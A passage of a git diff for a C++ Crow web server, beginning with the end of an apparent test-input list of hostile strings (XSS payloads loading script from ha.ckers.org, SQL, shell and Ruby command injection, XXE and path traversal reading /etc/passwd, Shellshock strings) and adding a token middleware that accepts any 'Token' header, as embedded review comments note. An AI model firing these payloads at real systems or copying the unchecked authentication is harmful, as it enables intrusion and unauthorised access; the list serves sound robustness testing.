+"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x 
onerror=\x00"javascript:alert(1)"> +<a href=javascript:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav	ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +<IMG SRC="jav
ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +<u oncopy=alert()> Copy me</u> +<i onwheel=alert(1)> Scroll over me </i> +<plaintext> +http://a/%%30%30 +</textarea><script>alert(123)</script> + +# SQL Injection +# +# Strings which can cause a SQL injection if inputs are not sanitized + +1;DROP TABLE users +1'; DROP TABLE users-- 1 +' OR 1=1 -- 1 +' OR '1'='1 + +% +_ + +# Server Code Injection +# +# Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) + +- +-- +--version +--help +$USER +/dev/null; touch /tmp/blns.fail ; echo +`touch /tmp/blns.fail` +$(touch /tmp/blns.fail) +@{[system "touch /tmp/blns.fail"]} + +# Command Injection (Ruby) +# +# Strings which can call system commands within Ruby/Rails applications + +eval("puts 'hello world'") +System("ls -al /") +`ls -al /` +Kernel.exec("ls -al /") +Kernel.exit(1) +%x('ls -al /') + +# XXE Injection (XML) +# +# String which can reveal system files when parsed by a badly configured XML parser + +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> + +# Unwanted Interpolation +# +# Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. 
+ +$HOME +$ENV{'HOME'} +%d +%s +{0} +%*.*s +File:/// + +# File Inclusion +# +# Strings which can cause user to pull in files that should not be a part of a web server + +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/hosts + +# Known CVEs and Vulnerabilities +# +# Strings that test for known vulnerabilities + +() { 0; }; touch /tmp/blns.shellshock1.fail; +() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } +<<< %s(un='%s') = %u ++++ATH0 + +# MSDOS/Windows Special Filenames +# +# Strings which are reserved characters in MSDOS/Windows + +CON +PRN +AUX +CLOCK$ +NUL +A: +ZZ: +COM1 +LPT1 +LPT2 +LPT3 +COM2 +COM3 +COM4 + +# IRC specific strings +# +# Strings that may occur on IRC clients that make security products freak out + +DCC SEND STARTKEYLOGGER 0 0 0 + +# Scunthorpe Problem +# +# Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) + +Scunthorpe General Hospital +Penistone Community Church +Lightwater Country Park +Jimmy Clitheroe +Horniman Museum +shitake mushrooms +RomansInSussex.co.uk +http://www.cum.qc.ca/ +Craig Cockburn, Software Specialist +Linda Callahan +Dr. Herman I. Libshitz +magna cum laude +Super Bowl XXX +medieval erection of parapets +evaluate +mocha +expression +Arsenal canal +classic +Tyson Gay +Dick Van Dyke +basement + +# Human injection +# +# Strings which may cause human to reinterpret worldview + +If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. + +# Terminal escape codes +# +# Strings which punish the fools who use cat/type on this file + +Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue +But now...[20Cfor my greatest trick...[8m +The quick brown fox... 
[Beeeep] + +# iOS Vulnerabilities +# +# Strings which crashed iMessage in various versions of iOS + +Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 +🏳0🌈️
\ No newline at end of file
diff --git a/src/gtest_main.cpp b/src/gtest_main.cpp
new file mode 100644
index 0000000000..1659be89ee
--- /dev/null
+++ b/src/gtest_main.cpp
@@ -0,0 +1,6 @@
+#include "gtest/gtest.h"
+
+int main(int argc, char **argv) {
+ ::testing::InitGoogleTest(&argc, argv);
+ return RUN_ALL_TESTS();
+}
\ No newline at end of file
diff --git a/src/token_authorization_middleware.cpp b/src/token_authorization_middleware.cpp
new file mode 100644
index 0000000000..61ac28debd
--- /dev/null
+++ b/src/token_authorization_middleware.cpp
@@ -0,0 +1,49 @@
+#include <unordered_map>
+
+#include <boost/algorithm/string/predicate.hpp>
+
+#include <token_authorization_middleware.hpp>
+
+namespace crow
+{
+ std::string TokenAuthorizationMiddleware::context::get_cookie(const std::string& key)
+ {
+ if (cookie_sessions.count(key))
+ return cookie_sessions[key];
+ return {};
+ }
+
+ void TokenAuthorizationMiddleware::context::set_cookie(const std::string& key, const std::string& value)
+ {
+ cookies_to_push_to_client.emplace(key, value);
+ }
+
+
+ void TokenAuthorizationMiddleware::before_handle(crow::request& req, response& res, context& ctx)
+ {
+ if (req.url == "/login"){
+ return;
+ }
+
+ // Check for an authorization header, reject if not present
+ if (req.headers.count("Authorization") != 1) {
+ res.code = 400;
+ res.end();
+ return;
+ }
+ std::string auth_header = req.get_header_value("Authorization");
+ // If the user is attempting any kind of auth other than token, reject
+ if (!boost::starts_with(auth_header, "Token ")) {
+ res.code = 400;
+ res.end();
+ }
+ }
+
+ void TokenAuthorizationMiddleware::after_handle(request& /*req*/, response& res, context& ctx)
+ {
+ for (auto& cookie : ctx.cookies_to_push_to_client) {
+ res.add_header("Set-Cookie", cookie.first + "=" + cookie.second);
+ }
+ }
+
+}
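Review bot: `before_handle` never validates the token: once `auth_header` starts with `"Token "` the request falls through to the handler without the value being compared to anything (`ctx` and `cookie_sessions` are unused here), so at this commit any `Authorization: Token x` is accepted. If that is intentional scaffolding, mark it so it is not mistaken for working auth: `// TODO: look the token up in the session store; currently any "Token " header passes`. The rejections answer 400, whereas 401 with a `WWW-Authenticate: Token` header is the conventional status for an unauthenticated request, and the second rejection branch should `return` like the first so a later addition below it cannot run on a rejected request. In `after_handle` the cookie is emitted as bare `key=value` with no `Secure`, `HttpOnly` or `SameSite` attribute and no check that the value is free of `;`, CR or LF; if these cookies carry session material, as the names suggest, append `"; Secure; HttpOnly; SameSite=Strict"` and reject values containing those characters. `get_cookie` also does `count` followed by `operator[]`; a single `find` avoids the double lookup.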
\ No newline at end of file
diff --git a/src/token_authorization_middleware_test.cpp b/src/token_authorization_middleware_test.cpp
new file mode 100644
index 0000000000..8d5be1ebbd
--- /dev/null
+++ b/src/token_authorization_middleware_test.cpp
@@ -0,0 +1,26 @@
+#include "token_authorization_middleware.hpp"
+#include <crow/app.h>
+#include "gtest/gtest.h"
+
+
+// Tests that Base64 basic strings work
+TEST(Authentication, TestBasicReject)
+{
+ crow::App<crow::TokenAuthorizationMiddleware> app;
+ crow::request req;
+ crow::response res;
+ app.handle(req, res);
+ ASSERT_EQ(res.code, 400);
+
+
+ crow::App<crow::TokenAuthorizationMiddleware> app;
+ decltype(app)::server_t server(&app, "127.0.0.1", 45451);
+ CROW_ROUTE(app, "/")([&](const crow::request& req)
+ {
+ app.get_context<NullMiddleware>(req);
+ app.get_context<NullSimpleMiddleware>(req);
+ return "";
+ });
+}
+
+
diff --git a/src/example.cpp b/src/webserver_main.cpp
index 91fdb7f8aa..bbe599e847
--- a/src/example.cpp
+++ b/src/webserver_main.cpp
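Review bot: `crow::App<crow::TokenAuthorizationMiddleware> app;` is declared twice in the same scope of `TestBasicReject`, which is a redefinition error, and the second half of the test refers to `NullMiddleware` and `NullSimpleMiddleware`, which none of the three included headers visibly declares; the `server` is constructed but never run and the `/` route is never invoked, so that half asserts nothing even if it compiled. Drop the second `app`, the `server` and the route (or move them into a test that actually drives a request through the server) and keep the first five lines with the `ASSERT_EQ(res.code, 400)`. The remaining assertion covers only the missing-header path; add one request carrying a non-Token scheme (e.g. `Basic …`) expecting 400 and one carrying `Token …` expecting the middleware not to set a code, since those are the two branches in `before_handle`. The leading comment `// Tests that Base64 basic strings work` is copy-pasted from the base64 test and should read `// Tests that a request without an Authorization header is rejected`.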
@@ -1,106 +1,71 @@ -#include "crow/query_string.h" -#include "crow/http_parser_merged.h" #include "crow/ci_map.h" +#include "crow/http_parser_merged.h" +#include "crow/query_string.h" //#include "crow/TinySHA1.hpp" -#include "crow/settings.h" -#include "crow/socket_adaptors.h" -#include "crow/json.h" -#include "crow/mustache.h" -#include "crow/logging.h" -#include "crow/dumb_timer_queue.h" -#include "crow/utility.h" +#include "crow/app.h" #include "crow/common.h" +#include "crow/dumb_timer_queue.h" +#include "crow/http_connection.h" #include "crow/http_request.h" -#include "crow/websocket.h" -#include "crow/parser.h" #include "crow/http_response.h" +#include "crow/http_server.h" +#include "crow/json.h" +#include "crow/logging.h" #include "crow/middleware.h" -#include "crow/routing.h" #include "crow/middleware_context.h" -#include "crow/http_connection.h" -#include "crow/http_server.h" -#include "crow/app.h" +#include "crow/mustache.h" +#include "crow/parser.h" +#include "crow/routing.h" +#include "crow/settings.h" +#include "crow/socket_adaptors.h" +#include "crow/utility.h" +#include "crow/websocket.h" #include "color_cout_g3_sink.hpp" -#include "ssl_key_handler.hpp" +#include "token_authorization_middleware.hpp" + #include <iostream> #include <string> - - - -struct ExampleMiddleware -{ - std::string message; - - ExampleMiddleware() - { - message = "foo"; - } - - void setMessage(std::string newMsg) - { - message = newMsg; - } - - struct context - { - }; - - void before_handle(crow::request& /*req*/, crow::response& /*res*/, context& /*ctx*/) - { - CROW_LOG_DEBUG << " - MESSAGE: " << message; - } - - void after_handle(crow::request& /*req*/, crow::response& /*res*/, context& /*ctx*/) - { - // no-op - } -}; - - +#include "ssl_key_handler.hpp" int main(int argc, char** argv) { - auto worker = g3::LogWorker::createLogWorker(); - auto handle= worker->addDefaultLogger(argv[0], "/tmp/"); - g3::initializeLogging(worker.get()); - auto log_file_name = 
handle->call(&g3::FileSink::fileName); - auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), - &crow::ColorCoutSink::ReceiveLogMessage); + auto worker = g3::LogWorker::createLogWorker(); + auto handle = worker->addDefaultLogger(argv[0], "/tmp/"); + g3::initializeLogging(worker.get()); + auto log_file_name = handle->call(&g3::FileSink::fileName); + auto sink_handle = worker->addSink(std::make_unique<crow::ColorCoutSink>(), + &crow::ColorCoutSink::ReceiveLogMessage); - LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; + LOG(DEBUG) << "Logging to " << log_file_name.get() << "\n"; std::string ssl_pem_file("server.pem"); ensuressl::ensure_openssl_key_present_and_valid(ssl_pem_file); //auto handler2 = std::make_shared<ExampleLogHandler>(); //crow::logger::setHandler(handler2.get()); - crow::App<ExampleMiddleware> app; - - app.get_middleware<ExampleMiddleware>().setMessage("hello"); + crow::App<crow::TokenAuthorizationMiddleware> app; CROW_ROUTE(app, "/") - .name("hello") - ([]{ - return "Hello World!"; - }); + .name("hello")([] { + return "Hello World!"; + }); CROW_ROUTE(app, "/about") - ([](){ + ([]() { return "About Crow example."; }); // a request to /path should be forwarded to /path/ CROW_ROUTE(app, "/path/") - ([](){ + ([]() { return "Trailing slash test case.."; }); - // simple json response // To see it in action enter {ip}:18080/json CROW_ROUTE(app, "/json") - ([]{ + ([] { crow::json::wvalue x; x["message"] = "Hello, World!"; return x; @@ -108,8 +73,8 @@ int main(int argc, char** argv) // To see it in action enter {ip}:18080/hello/{integer_between -2^32 and 100} and you should receive // {integer_between -2^31 and 100} bottles of beer! - CROW_ROUTE(app,"/hello/<int>") - ([](int count){ + CROW_ROUTE(app, "/hello/<int>") + ([](int count) { if (count > 100) return crow::response(400); std::ostringstream os; 
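Review bot: With `crow::App<crow::TokenAuthorizationMiddleware> app;` every route registered in main is gated by the new middleware, which (per src/token_authorization_middleware.cpp in this commit) exempts only the exact url `/login` and otherwise demands an `Authorization` header; no `/login` route appears in this hunk, so unless one is registered elsewhere the example routes (`/`, `/about`, `/json`, …) answer 400 to every unauthenticated client with no way to obtain a token. A comment above the declaration should state that intent, e.g. `// All routes except /login require "Authorization: Token ..." (see TokenAuthorizationMiddleware)`. main's body continues past this hunk.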
@@ -118,10 +83,10 @@ int main(int argc, char** argv) }); // To see it in action submit {ip}:18080/add/1/2 and you should receive 3 (exciting, isn't it) - CROW_ROUTE(app,"/add/<int>/<int>") - ([](const crow::request& /*req*/, crow::response& res, int a, int b){ + CROW_ROUTE(app, "/add/<int>/<int>") + ([](const crow::request& /*req*/, crow::response& res, int a, int b) { std::ostringstream os; - os << a+b; + os << a + b; res.write(os.str()); res.end(); }); @@ -129,7 +94,7 @@ int main(int argc, char** argv) // Compile error with message "Handler type is mismatched with URL paramters" //CROW_ROUTE(app,"/another/<int>") //([](int a, int b){ - //return crow::response(500); + //return crow::response(500); //}); // more json example 
@@ -144,49 +109,48 @@ int main(int argc, char** argv) // A simpler way for json example: // * curl -d '{"a":1,"b":2}' {ip}:18080/add_json CROW_ROUTE(app, "/add_json") - .methods("POST"_method) - ([](const crow::request& req){ - auto x = crow::json::load(req.body); - if (!x) - return crow::response(400); - int sum = x["a"].i()+x["b"].i(); - std::ostringstream os; - os << sum; - return crow::response{os.str()}; - }); + .methods("POST"_method)([](const crow::request& req) { + auto x = crow::json::load(req.body); + if (!x) + return crow::response(400); + int sum = x["a"].i() + x["b"].i(); + std::ostringstream os; + os << sum; + return crow::response{os.str()}; + }); // Example of a request taking URL parameters // If you want to activate all the functions just query // {ip}:18080/params?foo='blabla'&pew=32&count[]=a&count[]=b CROW_ROUTE(app, "/params") - ([](const crow::request& req){ + ([](const crow::request& req) { std::ostringstream os; // To get a simple string from the url params // To see it in action /params?foo='blabla' - os << "Params: " << req.url_params << "\n\n"; + os << "Params: " << req.url_params << "\n\n"; os << "The key 'foo' was " << (req.url_params.get("foo") == nullptr ? 
"not " : "") << "found.\n"; // To get a double from the request // To see in action submit something like '/params?pew=42' - if(req.url_params.get("pew") != nullptr) { + if (req.url_params.get("pew") != nullptr) { double countD = boost::lexical_cast<double>(req.url_params.get("pew")); - os << "The value of 'pew' is " << countD << '\n'; + os << "The value of 'pew' is " << countD << '\n'; } // To get a list from the request // You have to submit something like '/params?count[]=a&count[]=b' to have a list with two values (a and b) auto count = req.url_params.get_list("count"); os << "The key 'count' contains " << count.size() << " value(s).\n"; - for(const auto& countVal : count) { + for (const auto& countVal : count) { os << " - " << countVal << '\n'; } return crow::response{os.str()}; - }); + }); CROW_ROUTE(app, "/large") - ([]{ - return std::string(512*1024, ' '); + ([] { + return std::string(512 * 1024, ' '); }); // ignore all log |